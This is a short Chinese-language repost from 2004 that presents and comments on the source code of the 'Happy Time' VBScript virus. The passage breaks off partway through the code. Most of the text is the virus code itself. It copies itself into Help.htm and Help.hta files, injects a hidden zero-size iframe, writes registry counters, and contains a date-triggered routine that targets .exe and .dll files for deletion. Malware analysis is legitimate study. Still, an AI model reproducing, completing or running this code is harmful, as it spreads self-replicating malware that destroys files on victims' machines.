欢乐时光病毒原码分析 |
作者:swords 出处: ColorWolf:Swords 性质:转载 发布日期:2004-08-15 |
<script language='VBScript'> Rem I am sorry! happy time On Error Resume Next mload ----------------------从mload开始罪恶的历程 Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML Then ----------------------如果本程序是网页,就是在Outlook mURL = LCase(document.Location) If mPath = "" Then Os.Reset Os.Path = "C:/Help.htm" ----------------------建立help.htm Os.Doc = Lhtml() ------------调入全部源码 Os.Write() ----------------------存储自身到help.htm Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>" Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml) Else If Iv(mPath, "Help.vbs") Then setInterval "Rt()", 10000 Else m = "hta" If LCase(m) = Right(mURL, Len(m)) Then id = setTimeout("mclose()", 1) ---------调用mclose main ----------------进入主程序 Else Os.Reset() Os.Path = mPath & "/" & "Help.hta" ------------建立Help.hta文件 Os.Doc = Lhtml() Os.write() Iv mPath, "Help.hta" End If End If End If Else main End If End Sub Sub main() ----------------主程序 On Error Resume Next Set Of = CreateObject("Scripting.FileSystemObject") Set Od = CreateObject("Scripting.Dictionary") Od.Add "html", "1100" Od.Add "vbs", "0100" Od.Add "htm", "1100" Od.Add "asp", "0010" Ks = "HKEY_CURRENT_USER/Software/" -----------------写注册表 Ds = Grf() Cs = Gsf() If IsVbs Then If Of.FileExists("C:/help.htm") Then Of.DeleteFile ("C:/help.htm") End If Key = CInt(Month(Date) + Day(Date)) ---------------注意:破坏动作 If Key = 13 Then ---------------如果月日之和等于13 Od.RemoveAll Od.Add "exe", "0001" ---------------删除.exe.dll文件 Od.Add "dll", "0001" End If Cn = Rg(Ks & "Help/Count") ------------修改注册表的计数器 If Cn = "" Then Cn = 1 End If Rw Ks & "Help/Count", Cn + 1 f1 = Rg(Ks & "Help/FileName") f2 = FNext(Of, Od, f1) fext = GetExt(Of, Od, f2) Rw Ks & "Help/FileName", f2 If IsDel(fext) Then f3 = f2 |